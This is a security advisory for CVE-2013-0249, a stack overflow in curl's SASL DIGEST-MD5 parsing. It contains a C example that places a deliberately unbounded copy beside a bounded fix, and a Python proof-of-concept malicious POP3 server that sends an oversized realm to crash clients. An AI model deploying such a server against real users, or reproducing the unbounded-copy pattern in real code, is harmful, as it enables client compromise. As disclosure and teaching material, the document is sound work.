Credit:
The information has been provided by Volema.
The original article can be found at: http://curl.haxx.se/docs/adv_20130206.html
Vulnerable Systems:
* cURL 7.26.0 through 7.28.1 (fixed in 7.29.0)
* libcURL 7.26.0 through 7.28.1 (fixed in 7.29.0)
cURL and libcURL contain a stack-based buffer overflow in the 'Curl_sasl_create_digest_md5_message()' function [lib/curl_sasl.c]. The issue is triggered when communicating over POP3, SMTP or IMAP: when SASL DIGEST-MD5 authentication is negotiated, the challenge data sent by the server is copied into a fixed-size buffer on the stack without proper length validation. A malicious server can therefore send an oversized challenge field, such as the realm, to overflow that buffer, which may result in arbitrary code execution in the client.
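As an added illustration (this is example code, not curl's source), the following C model shows the bug class described above: the key="value" fields of a decoded DIGEST-MD5 challenge are extracted into fixed-size stack buffers. The unbounded copy is the vulnerable pattern; the bounded variant refuses any field that does not fit instead of writing past the buffer. Buffer sizes (REALM_MAX, NONCE_MAX), function names and the helper that rebuilds the challenge are this example's own assumptions; the challenge text itself is the one the PoC server below sends, with a realm of 128 'A's.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Buffer sizes are this example's assumptions, not curl's. */
#define REALM_MAX 128
#define NONCE_MAX 64

/* Vulnerable pattern: copy everything between key and end_char into value,
 * trusting the server-controlled challenge to be short enough. */
static bool get_key_value_unbounded(const char *chlg, const char *key,
                                    char *value, char end_char)
{
    const char *p = strstr(chlg, key);
    if (!p)
        return false;
    p += strlen(key);
    while (*p && *p != end_char)
        *value++ = *p++;      /* no bound: an oversized field overruns value */
    *value = '\0';
    return true;
}

/* Hardened: never write more than max_len bytes (NUL included) and treat a
 * field that does not fit as a protocol error rather than truncating it. */
static bool get_key_value_bounded(const char *chlg, const char *key,
                                  char *value, size_t max_len, char end_char)
{
    const char *p = strstr(chlg, key);
    size_t i = 0;
    if (!p || max_len == 0)
        return false;
    p += strlen(key);
    while (p[i] && p[i] != end_char) {
        if (i + 1 >= max_len)  /* would overflow: reject the whole challenge */
            return false;
        value[i] = p[i];
        i++;
    }
    value[i] = '\0';
    return true;
}

struct digest_challenge {
    char realm[REALM_MAX];
    char nonce[NONCE_MAX];
};

/* Extract realm and nonce from a base64-decoded challenge using the bounded
 * extractor; true only if both are present and fit their buffers. */
bool parse_digest_challenge(const char *chlg, struct digest_challenge *out)
{
    memset(out, 0, sizeof(*out));
    return get_key_value_bounded(chlg, "realm=\"", out->realm, sizeof(out->realm), '"')
        && get_key_value_bounded(chlg, "nonce=\"", out->nonce, sizeof(out->nonce), '"');
}

/* Build the challenge the PoC server sends, with a realm of realm_len 'A's.
 * Returns the length written, or 0 if buf is too small (constructed input). */
size_t build_challenge(char *buf, size_t buflen, size_t realm_len)
{
    static const char head[] = "realm=\"";
    static const char tail[] =
        "\",nonce=\"OA6MG9tEQGm2hh\",qop=\"auth\",algorithm=md5-sess,charset=utf-8";
    size_t need = sizeof(head) - 1 + realm_len + sizeof(tail);  /* incl. NUL */
    if (buflen < need)
        return 0;
    memcpy(buf, head, sizeof(head) - 1);
    memset(buf + sizeof(head) - 1, 'A', realm_len);
    memcpy(buf + sizeof(head) - 1 + realm_len, tail, sizeof(tail));
    return need - 1;
}

/* Does a PoC-style challenge with a realm_len-byte realm pass the parser? */
bool challenge_with_realm_parses(size_t realm_len)
{
    char chlg[512];
    struct digest_challenge dc;
    return build_challenge(chlg, sizeof(chlg), realm_len) != 0
        && parse_digest_challenge(chlg, &dc);
}

/* Is the nonce recovered from such a challenge equal to expected? */
bool parsed_nonce_is(size_t realm_len, const char *expected)
{
    char chlg[512];
    struct digest_challenge dc;
    return build_challenge(chlg, sizeof(chlg), realm_len) != 0
        && parse_digest_challenge(chlg, &dc)
        && strcmp(dc.nonce, expected) == 0;
}

int main(void)
{
    char chlg[512], small[32];
    build_challenge(chlg, sizeof(chlg), 16);
    /* Safe here only because this nonce is known to be 14 bytes; a malicious
     * server chooses the length, which is exactly the advisory's point. */
    get_key_value_unbounded(chlg, "nonce=\"", small, '"');
    printf("unbounded nonce copy: %s\n", small);
    printf("realm of 127 bytes parses: %d\n", challenge_with_realm_parses(127));
    printf("realm of 128 bytes parses: %d\n", challenge_with_realm_parses(128));
    return 0;
}
```

With REALM_MAX set to 128, a 127-byte realm is the longest that fits with its terminator; the PoC's 128-byte realm is rejected by the bounded extractor, whereas the unbounded one would write the terminating NUL one byte past the buffer. Rejecting rather than silently truncating is the better choice for an authentication exchange, since a truncated realm would make the client compute a digest the server never asked for.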
Exploit:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# curl pop3 CVE-2013-0249 by Volema/MSLC
# Malicious POP3 server: advertises only SASL DIGEST-MD5 and answers the
# client's AUTH with a challenge whose realm is 128 bytes long.
import socket
import base64

host = "localhost"
port = 110  # privileged port: run as root or change it (e.g. 1100)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
sock, addr = s.accept()
sock.send(b'+OK POP3 server ready\n')

while True:
    buf = sock.recv(1024)
    print(buf)
    if not buf:  # client closed the connection
        break
    if buf.find(b'USER') > -1:
        sock.send(b'+OK\n')
    if buf.find(b'PASS') > -1:
        sock.send(b'-ERR 999\n')
    if buf.find(b'CAPA') > -1:
        # Capability list: DIGEST-MD5 is the only SASL mechanism offered
        resp = b'+OK List of capabilities follows\n'
        resp += b'SASL DIGEST-MD5\n'
        resp += b'IMPLEMENTATION dumbydumb POP3 server\n'
        resp += b'.\n'
        sock.send(resp)
    if buf.find(b'QUIT') > -1:
        sock.send(b'+OK')
        break
    if buf.find(b'AUTH') > -1:
        # Oversized realm: the client copies it into a fixed-size stack
        # buffer without checking its length
        realm = b'A' * 128
        payload = b'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm
        resp = b'+ ' + base64.b64encode(payload) + b'\n'
        print(resp)
        sock.send(resp)

sock.close()
CVE Information:
CVE-2013-0249
Disclosure Timeline:
Vendor Solution Date: 2013-02-07
Disclosure Date: 2013-02-07
Exploit Publish Date: 2013-02-06